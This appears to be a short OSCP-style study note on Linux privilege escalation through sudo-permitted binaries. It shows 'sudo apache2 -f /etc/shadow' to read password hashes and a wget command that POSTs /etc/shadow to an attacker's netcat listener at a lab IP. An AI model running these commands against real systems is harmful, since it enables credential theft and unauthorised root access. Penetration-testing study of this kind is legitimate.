// notes/ PrivEsc — Linux
🐧

Sudo Intended Functionality

After running sudo -l you come across apache2, however it isn't in gtfobins.

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/sudo_intended-functionality

Intended Functionality

Example

After running sudo -l you come across apache2, however it isn't in gtfobins.

Quick google search can lead you here.

Apache 2 has the ability to read files so you can abuse this by reading the shadow file

code
01sudo apache2 -f /etc/shadow
<figure><img src="/files/0OwTUGYaPXjbg33CGfqC" alt=""><figcaption></figcaption></figure>

Another example could be with wget and sending yourself the shadow file with POST and a nc listener

code
01sudo wget --post-file=/etc/shadow 10.10.14.8:1337